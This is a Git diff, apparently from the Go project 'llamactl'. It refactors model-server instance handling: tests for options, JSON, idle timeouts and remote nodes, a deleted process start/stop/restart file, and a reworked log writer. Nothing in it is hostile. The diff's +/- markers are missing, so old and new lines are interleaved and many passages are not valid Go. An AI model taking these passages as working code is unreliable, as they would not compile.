options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
optionsWithOverrides := &instance.Options{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst2 := instance.New("test-override", globalConfig, optionsWithOverrides, mockOnStatusChange)
opts2 := inst2.GetOptions()
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
if opts2.AutoRestart == nil || *opts2.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
}
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
initialOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
inst := instance.New("test-instance", globalConfig, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
newOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
@@ -191,103 +171,35 @@ func TestSetOptions(t *testing.T) {
}
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
inst := instance.New("test-instance", globalConfig, options, nil)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
data, err := json.Marshal(inst)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
// Verify by unmarshaling and checking key fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
if err := json.Unmarshal(data, &result); err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
@@ -297,37 +209,9 @@ func TestMarshalJSON(t *testing.T) {
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
if result["options"] == nil {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
@@ -345,7 +229,7 @@ func TestUnmarshalJSON(t *testing.T) {
}
}`
var inst instance.Process
var inst instance.Instance
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
@@ -362,14 +246,14 @@ func TestUnmarshalJSON(t *testing.T) {
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
}
if opts.LlamaServerOptions == nil {
if opts.BackendOptions.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -382,7 +266,7 @@ func TestUnmarshalJSON(t *testing.T) {
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
func TestCreateOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
@@ -413,40 +297,45 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
options := &instance.Options{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
instance := instance.New("test", globalConfig, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
@@ -463,3 +352,295 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
})
}
}
func TestStatusChangeCallback(t *testing.T) {
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
var callbackOldStatus, callbackNewStatus instance.Status
callbackCalled := false
onStatusChange := func(oldStatus, newStatus instance.Status) {
callbackOldStatus = oldStatus
callbackNewStatus = newStatus
callbackCalled = true
}
inst := instance.New("test", globalConfig, options, onStatusChange)
inst.SetStatus(instance.Running)
if !callbackCalled {
t.Error("Expected status change callback to be called")
}
if callbackOldStatus != instance.Stopped {
t.Errorf("Expected old status Stopped, got %v", callbackOldStatus)
}
if callbackNewStatus != instance.Running {
t.Errorf("Expected new status Running, got %v", callbackNewStatus)
}
}
func TestSetOptions_NodesPreserved(t *testing.T) {
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
tests := []struct {
name string
initialNodes map[string]struct{}
updateNodes map[string]struct{}
expectedNodes map[string]struct{}
}{
{
name: "nil nodes preserved as nil",
initialNodes: nil,
updateNodes: map[string]struct{}{"worker1": {}},
expectedNodes: nil,
},
{
name: "empty nodes preserved as empty",
initialNodes: map[string]struct{}{},
updateNodes: map[string]struct{}{"worker1": {}},
expectedNodes: map[string]struct{}{},
},
{
name: "existing nodes preserved",
initialNodes: map[string]struct{}{"worker1": {}, "worker2": {}},
updateNodes: map[string]struct{}{"worker3": {}},
expectedNodes: map[string]struct{}{"worker1": {}, "worker2": {}},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.Options{
Nodes: tt.initialNodes,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
inst := instance.New("test", globalConfig, options, nil)
// Attempt to update nodes (should be ignored)
updateOptions := &instance.Options{
Nodes: tt.updateNodes,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
},
},
}
inst.SetOptions(updateOptions)
opts := inst.GetOptions()
// Verify nodes are preserved
if len(opts.Nodes) != len(tt.expectedNodes) {
t.Errorf("Expected %d nodes, got %d", len(tt.expectedNodes), len(opts.Nodes))
}
for node := range tt.expectedNodes {
if _, exists := opts.Nodes[node]; !exists {
t.Errorf("Expected node %s to exist", node)
}
}
// Verify other options were updated
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
})
}
}
func TestProcessErrorCases(t *testing.T) {
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
inst := instance.New("test", globalConfig, options, nil)
// Stop when not running should return error
err := inst.Stop()
if err == nil {
t.Error("Expected error when stopping non-running instance")
}
// Simulate running state
inst.SetStatus(instance.Running)
// Start when already running should return error
err = inst.Start()
if err == nil {
t.Error("Expected error when starting already running instance")
}
}
func TestRemoteInstanceOperations(t *testing.T) {
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{
"remote-node": {Address: "http://remote-node:8080"},
},
LocalNode: "main",
}
options := &instance.Options{
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
inst := instance.New("remote-test", globalConfig, options, nil)
if !inst.IsRemote() {
t.Error("Expected instance to be remote")
}
// Start should fail for remote instance
if err := inst.Start(); err == nil {
t.Error("Expected error when starting remote instance")
}
// Stop should fail for remote instance
if err := inst.Stop(); err == nil {
t.Error("Expected error when stopping remote instance")
}
// Restart should fail for remote instance
if err := inst.Restart(); err == nil {
t.Error("Expected error when restarting remote instance")
}
// GetLogs should fail for remote instance
if _, err := inst.GetLogs(10); err == nil {
t.Error("Expected error when getting logs for remote instance")
}
}
func TestIdleTimeout(t *testing.T) {
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
t.Run("not running never times out", func(t *testing.T) {
timeout := 1
inst := instance.New("test", globalConfig, &instance.Options{
IdleTimeout: &timeout,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}, nil)
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
})
t.Run("no timeout configured", func(t *testing.T) {
inst := instance.New("test", globalConfig, &instance.Options{
IdleTimeout: nil, // No timeout
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}, nil)
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Error("Instance with no timeout configured should not timeout")
}
})
t.Run("timeout exceeded", func(t *testing.T) {
timeout := 1 // 1 minute
inst := instance.New("test", globalConfig, &instance.Options{
IdleTimeout: &timeout,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Host: "localhost",
Port: 8080,
},
},
}, nil)
inst.SetStatus(instance.Running)
// Use mock time provider
mockTime := &mockTimeProvider{currentTime: time.Now().Unix()}
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.currentTime = time.Now().Add(2 * time.Minute).Unix()
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when idle time exceeds configured timeout")
}
})
}
// mockTimeProvider for timeout testing
type mockTimeProvider struct {
currentTime int64 // Unix timestamp
}
func (m *mockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime, 0)
}

View File

@@ -1,412 +0,0 @@
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name)
}
// Safety check: ensure options are valid
if i.options == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Reset restart counter when manually starting (not during auto-restart)
// We can detect auto-restart by checking if restartCancel is set
if i.restartCancel == nil {
i.restarts = 0
}
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create context before building command (needed for CommandContext)
i.ctx, i.cancel = context.WithCancel(context.Background())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
}
// Build command using backend-specific methods
cmd, cmdErr := i.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
i.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(i.cmd)
}
var err error
i.stdout, err = i.cmd.StdoutPipe()
if err != nil {
i.logger.Close()
return fmt.Errorf("failed to get stdout pipe: %w", err)
}
i.stderr, err = i.cmd.StderrPipe()
if err != nil {
i.stdout.Close()
i.logger.Close()
return fmt.Errorf("failed to get stderr pipe: %w", err)
}
if err := i.cmd.Start(); err != nil {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
}
i.SetStatus(Running)
// Create channel for monitor completion signaling
i.monitorDone = make(chan struct{})
go i.logger.readOutput(i.stdout)
go i.logger.readOutput(i.stderr)
go i.monitorProcess()
return nil
}
// Stop terminates the subprocess
func (i *Process) Stop() error {
i.mu.Lock()
if !i.IsRunning() {
// Even if not running, cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
i.restartCancel = nil
log.Printf("Cancelled pending restart for instance %s", i.Name)
}
i.mu.Unlock()
return fmt.Errorf("instance %s is not running", i.Name)
}
// Cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
i.restartCancel = nil
}
// Set status to stopped first to signal intentional stop
i.SetStatus(Stopped)
// Clean up the proxy
i.proxy = nil
// Get the monitor done channel before releasing the lock
monitorDone := i.monitorDone
i.mu.Unlock()
// Stop the process with SIGINT if cmd exists
if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
}
}
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
}
log.Printf("Instance %s did not stop in time, force killed", i.Name)
// Wait a bit more for the monitor to finish after force kill
select {
case <-monitorDone:
// Monitor completed after force kill
case <-time.After(2 * time.Second):
log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", i.Name)
}
}
}
i.logger.Close()
return nil
}
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
var host string
var port int
switch opts.BackendType {
case backends.BackendTypeLlamaCpp:
if opts.LlamaServerOptions != nil {
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if opts.MlxServerOptions != nil {
host = opts.MlxServerOptions.Host
port = opts.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if opts.VllmServerOptions != nil {
host = opts.VllmServerOptions.Host
port = opts.VllmServerOptions.Port
}
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
close(i.monitorDone)
i.monitorDone = nil
}
i.mu.Unlock()
}()
err := i.cmd.Wait()
i.mu.Lock()
// Check if the instance was intentionally stopped
if !i.IsRunning() {
i.mu.Unlock()
return
}
i.SetStatus(Stopped)
i.logger.Close()
// Cancel any existing restart context since we're handling a new exit
if i.restartCancel != nil {
i.restartCancel()
i.restartCancel = nil
}
// Log the exit
if err != nil {
log.Printf("Instance %s crashed with error: %v", i.Name, err)
// Handle restart while holding the lock, then release it
i.handleRestart()
} else {
log.Printf("Instance %s exited cleanly", i.Name)
i.mu.Unlock()
}
}
// handleRestart manages the restart process while holding the lock
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock()
return
}
i.restarts++
log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
i.Name, i.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
// Create a cancellable context for the restart delay
restartCtx, cancel := context.WithCancel(context.Background())
i.restartCancel = cancel
// Release the lock before sleeping
i.mu.Unlock()
// Use context-aware sleep so it can be cancelled
select {
case <-time.After(time.Duration(restartDelay) * time.Second):
// Sleep completed normally, continue with restart
case <-restartCtx.Done():
// Restart was cancelled
log.Printf("Restart cancelled for instance %s", i.Name)
return
}
// Restart the instance
if err := i.Start(); err != nil {
log.Printf("Failed to restart instance %s: %v", i.Name, err)
} else {
log.Printf("Successfully restarted instance %s", i.Name)
// Clear the cancel function
i.mu.Lock()
i.restartCancel = nil
i.mu.Unlock()
}
}
// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0
}
if i.options.AutoRestart == nil || !*i.options.AutoRestart {
log.Printf("Instance %s not restarting: AutoRestart is disabled", i.Name)
return false, 0, 0
}
if i.options.MaxRestarts == nil {
log.Printf("Instance %s not restarting: MaxRestarts is nil", i.Name)
return false, 0, 0
}
if i.options.RestartDelay == nil {
log.Printf("Instance %s not restarting: RestartDelay is nil", i.Name)
return false, 0, 0
}
// Values are already validated during unmarshaling/SetOptions
maxRestarts = *i.options.MaxRestarts
restartDelay = *i.options.RestartDelay
if i.restarts >= maxRestarts {
log.Printf("Instance %s exceeded max restart attempts (%d)", i.Name, maxRestarts)
return false, 0, 0
}
return true, maxRestarts, restartDelay
}
// buildCommand builds the command to execute using backend-specific logic
func (i *Process) buildCommand() (*exec.Cmd, error) {
// Get backend configuration
backendConfig, err := i.getBackendConfig()
if err != nil {
return nil, err
}
// Build the environment variables
env := i.options.BuildEnvironment(backendConfig)
// Get the command to execute
command := i.options.GetCommand(backendConfig)
// Build command arguments
args := i.options.BuildCommandArgs(backendConfig)
// Create the exec.Cmd
cmd := exec.CommandContext(i.ctx, command, args...)
cmd.Env = []string{}
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}
// getBackendConfig resolves the backend configuration for the current instance
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
var backendTypeStr string
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
backendTypeStr = "llama-cpp"
case backends.BackendTypeMlxLm:
backendTypeStr = "mlx"
case backends.BackendTypeVllm:
backendTypeStr = "vllm"
default:
return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
}
settings := i.globalBackendSettings.GetBackendSettings(backendTypeStr)
return &settings, nil
}

View File

@@ -6,25 +6,31 @@ import (
"io"
"os"
"strings"
"sync"
"sync/atomic"
"time"
)
type InstanceLogger struct {
type logger struct {
name string
logDir string
logFile *os.File
logFile atomic.Pointer[os.File]
logFilePath string
mu sync.RWMutex
}
func NewInstanceLogger(name string, logDir string) *InstanceLogger {
return &InstanceLogger{
func newLogger(name string, logDir string) *logger {
return &logger{
name: name,
logDir: logDir,
}
}
// Create creates and opens the log files for stdout and stderr
func (i *InstanceLogger) Create() error {
// create creates and opens the log files for stdout and stderr
func (i *logger) create() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.logDir == "" {
return fmt.Errorf("logDir is empty for instance %s", i.name)
}
@@ -42,26 +48,25 @@ func (i *InstanceLogger) Create() error {
return fmt.Errorf("failed to create stdout log file: %w", err)
}
i.logFile = logFile
i.logFile.Store(logFile)
// Write a startup marker to both files
timestamp := time.Now().Format("2006-01-02 15:04:05")
fmt.Fprintf(i.logFile, "\n=== Instance %s started at %s ===\n", i.name, timestamp)
fmt.Fprintf(logFile, "\n=== Instance %s started at %s ===\n", i.name, timestamp)
return nil
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Process) GetLogs(num_lines int) (string, error) {
// getLogs retrieves the last n lines of logs from the instance
func (i *logger) getLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()
defer i.mu.RUnlock()
if logFileName == "" {
return "", fmt.Errorf("log file not created for instance %s", i.Name)
if i.logFilePath == "" {
return "", fmt.Errorf("log file not created for instance %s", i.name)
}
file, err := os.Open(logFileName)
file, err := os.Open(i.logFilePath)
if err != nil {
return "", fmt.Errorf("failed to open log file: %w", err)
}
@@ -93,26 +98,30 @@ func (i *Process) GetLogs(num_lines int) (string, error) {
return strings.Join(lines[start:], "\n"), nil
}
// closeLogFile closes the log files
func (i *InstanceLogger) Close() {
if i.logFile != nil {
// close closes the log files
func (i *logger) close() {
i.mu.Lock()
defer i.mu.Unlock()
logFile := i.logFile.Swap(nil)
if logFile != nil {
timestamp := time.Now().Format("2006-01-02 15:04:05")
fmt.Fprintf(i.logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
i.logFile.Close()
i.logFile = nil
fmt.Fprintf(logFile, "=== Instance %s stopped at %s ===\n\n", i.name, timestamp)
logFile.Sync() // Ensure all buffered data is written to disk
logFile.Close()
}
}
// readOutput reads from the given reader and writes lines to the log file
func (i *InstanceLogger) readOutput(reader io.ReadCloser) {
func (i *logger) readOutput(reader io.ReadCloser) {
defer reader.Close()
scanner := bufio.NewScanner(reader)
for scanner.Scan() {
line := scanner.Text()
if i.logFile != nil {
fmt.Fprintln(i.logFile, line)
i.logFile.Sync() // Ensure data is written to disk
// Use atomic load to avoid lock contention on every line
if logFile := i.logFile.Load(); logFile != nil {
fmt.Fprintln(logFile, line)
}
}
}

View File

@@ -4,15 +4,14 @@ import (
"encoding/json"
"fmt"
